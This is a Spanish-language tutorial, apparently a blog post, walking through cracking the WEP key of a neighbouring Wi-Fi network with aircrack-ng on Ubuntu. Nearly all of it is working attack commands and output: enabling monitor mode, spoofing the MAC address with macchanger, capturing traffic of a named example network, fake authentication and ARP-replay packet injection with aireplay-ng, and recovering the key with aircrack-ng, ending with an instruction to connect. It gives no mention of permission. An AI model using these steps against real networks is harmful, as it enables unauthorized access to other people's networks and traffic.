Tutorial: Hackeando Wireless

• Sistema Operativo: Ubuntu 9.04 o superior
• Tarjeta de Red Inalámbrica: Atheros (Preferentemente)
• Software: Aircrack-ng, MacChanger, Driver Tarjeta de Red Inalámbrica
• Habilitar Modo Monitor: En este tutorial se utilizará Airmon-ng. Checar como se habilita en vuestra tarjeta si no os sirve la manera de habilitarlo de este tutorial.
• Inyección de Paquetes: Checar en Google si tu tarjeta inalámbrica permite la Inyección de Paquetes
  Desde Ubuntu 9.04, los drivers se instalan automáticamente, entre ellos los de la red inalámbrica, así que si no detecta tu tarjeta inalámbrica existe un problema de compatibilidad entre los drivers y el sistema operativo.
• Datos Necesarios de la Red
  SSDI:
  BSSID:
  CHANNEL:
  
  Ejemplo:
  
  SSID: INFINITUM3184
  BSSID: 00:1F:B3:86:61:79
  CHANNEL: 6

Instalada la tarjeta de red inalámbrica y checado que es compatible para la inyección de paquetes. Procedemos a instalar aircrack-ng (Para ello necesitamos una fuente externa de Internet, por ejemplo en un Cibercafé conectándonos por medio de la LAN)

$ sudo apt-get install aircrack-ng

Ó pueden descargar la version para ubuntu i386:

AirCrack-ng 1.0

También necesitamos instalar el MacChanger, aquí esta la versión para ubuntu i386:

MacChanger 1.5.0

Habilitar Modo Monitor

De aquí en adelante debemos correr el terminal como root, así que colocamos en el terminal el siguiente código:

$ sudo -s

Nos va a pedir nuestra contraseña, la escribimos y listo, nuestro terminal está en root.

# iwconfig

  lo        no wireless extensions.

  

  eth0      no wireless extensions.

  

  wlan0     IEEE 802.11bgn  ESSID:"INFINITUMXXXX"  

            Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated

Para checar como se llama la interfaz wifi en mi caso wlan0 colocamos el código:

# airmon-ng stop wlan0

  Interface	Chipset		Driver
  
  wlan0		Atheros 	ath9k - [phy0]
                        (monitor mode disabled)

(En este caso es wlan0, porque así se llama en este ejemplo, pero se debe poner el que salga a usted) Proseguimos con el siguiente código:

  # airmon-ng start wlan0  
  

  Interface	Chipset		Driver
  
  wlan0		Atheros 	ath9k - [phy0]
                        (monitor mode enabled on mon0)

  Esto es para habilitar el modo monitor y poder capturas las redes. La tarjeta de red inalámbrica se pone en modo monitor en una tarjeta virtual llamada mon0, así que es la que usare al final de cada código porque es la que está en monitor (usar la que os aparezca).
  


  Necesitamos conocer nuestra MAC así que escribimos:
  


  # ifconfig -a  

  

  Donde diga wlan0 (en mi caso) ahí se encuentra la MAC de nuestra tarjeta inalámbrica.
  


  Ahora procedemos a cambiar la dirección MAC con el siguiente código:
  
  	# ifconfig wlan0 down //Para poder cambiar con éxito la dirección MAC
	# ifconfig mon0 down
	# macchanger -m 00:11:22:33:44:55 wlan0
	# macchanger -m 00:11:22:33:44:55 mon0

  Ya tenemos nuestra dirección MAC (que es la dirección de nuestro equipo) cambiada.
  


  Creamos la carpeta "Capturas" donde vamos a capturar paquetes, con el siguiente código:
  
  # mkdir Capturas
  # cd Capturas

  Abrir tres terminales y modo root colocarse en la carpeta Capturas.
  


  Volvemos a cargarla de modo monitor
  


  # ifconfig mon0 up  

  

Apagar la opción "Activar Red Inalámbrica" en el icono de networkmanager. Para tener trabajando la tarjeta en modo Monitor. 

Obtener los datos BSSID (primera columna), Channel (columna CH), ESSID (Columna donde están los nombres, ejemplo INFINITUM3184)

# airodump-ng mon0

Si muestra errores es porque no es compatible su tarjeta. Buscar una solución en Google.

Guardamos los datos en un editor de texto o en una libreta, ya que los usaremos en los demás comandos. Se recomienda que se elija la más alta de potencia (se ordenan las redes por potencia). Recordar que se está viendo el Hackeo de Calves WEP autenticación WEP.

  SSID: INFINITUM3184
  BSSID: 00:1F:B3:86:61:79
  CHANNEL: 6

Proseguimos con el siguiente código:

# airodump-ng -w ArchivodeCapturas -c canaldeDifusiondelaRedAtacada

Ejemplo: # airodump-ng mon0 -w iWinux -c 6
Captura datos del -c canal 6 y los guarda -w a archivo iWinux. No olvidar el nombre de archivo.

Inyección de Paquetes

Aceleremos captura aireplay-ng. Abrimos la segunda Consola con las indicaciones que di de root y carpeta donde se está llevando a cabo el hackeo y escribir:

# aireplay-ng -1 0 -e ESSID -a BSSID -h miMAC mon0

Ejemplo: # aireplay-ng -1 0 -e INFINITUM3184 -a 00:1F:B3:86:61:79 -h 00:11:22:33:44:55 mon0

Debe de mostrar:

Association successful :-)

Si no funciona a la primera. No limitarse al copiar y pegar, escribirla completa, así servirá. Cuidado con la dirección MAC, en caso que no se haya cambiado, les aparece el siguiente mensaje: "The interface MAC (11:22:33:44:55:66) doesn't match the specified MAC (-h)", copiar la MAC que nos muestre en lugar de la que habías supuestamente cambiado y tomarla en cuenta de aquí en adelante.

Aumentar el filtro con este comando:

# aireplay-ng -3 -b BSSID -h miMAC mon0

Ejemplo: # aireplay-ng -3 -b 00:1F:B3:86:61:79 -h 00:11:22:33:44:55 mon0

Ahora tendremos trabajando el airodump-ng y con el aireplay-ng ya inyectamos paquetes y con esta última aceleramos el proceso. Esperaremos juntar suficientes paquetes. Checar la consola con airodump-ng en la parte de #data, debe de estar aumentando más que estando solo el airodump-ng sin inyección. Y ahora a esperar.

Tenemos gráficamente:

Airodump en la primera consola.
Aireplay-ng para autenticación en la segunda consola
Aireplay-ng -3 -b pudimos haberla puesto en la consola 2

Y ya hasta este punto veremos capturar datos muy rápido por parte del airodump-ng, son datos llamados IV's.

Con estos datos aircrack-ng descifrara de manera rápida la Clave Wep.

Desde 30000 paquetes en adelante sirven para poder obtener la Clave Wep. Tiempo en general es según la tarjeta y según la distancia. Y la interferencia que se haga, pero en regular de 20 minutos a 1 hora (esperando el recomendado 80000 paquetes IV's capturados) necesarios para terminar satisfactoriamente y tener la clave.

Si tiene más de 80000 paquetes (con INFINITUM tan solo 30000) seguiremos con el siguiente paso. Esto de los paquetes IV's se ve en la columna que dice #Data.

En la tercera consola escribir:

# aircrack-ng miarchivo*.cap

Ejemplo: # aircrack-ng iWinux*.cap

Este es el archivo que colocamos en el paso de airodump-ng mon0 -w miarchivo -c channel. No olvidar el asterisco.

Muestra una lista de redes monitoreadas y sus respectivos IV's Capturados. Escoger la red monitoreada.

Esto nos mostrará algo como:

Opening iWinux-01.cap
Read 1950789 packets.


   #  BSSID              ESSID                     Encryption


   1  00:25:68:DD:DB:23  INFINITUMbbe8             No data - WEP or WPA
   2  00:1F:B3:86:61:79  INFINITUM3184             WEP (459560 IVs)


Index number of target network ? 

En mi caso coloco el número 2

Opening iWinux-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 471854 ivs.
                         KEY FOUND! [ XX:XX:XX:XX:XX ] 
	Decrypted correctly: 100%

Ahí está la clave encontrada. Guardadla y a conectarse.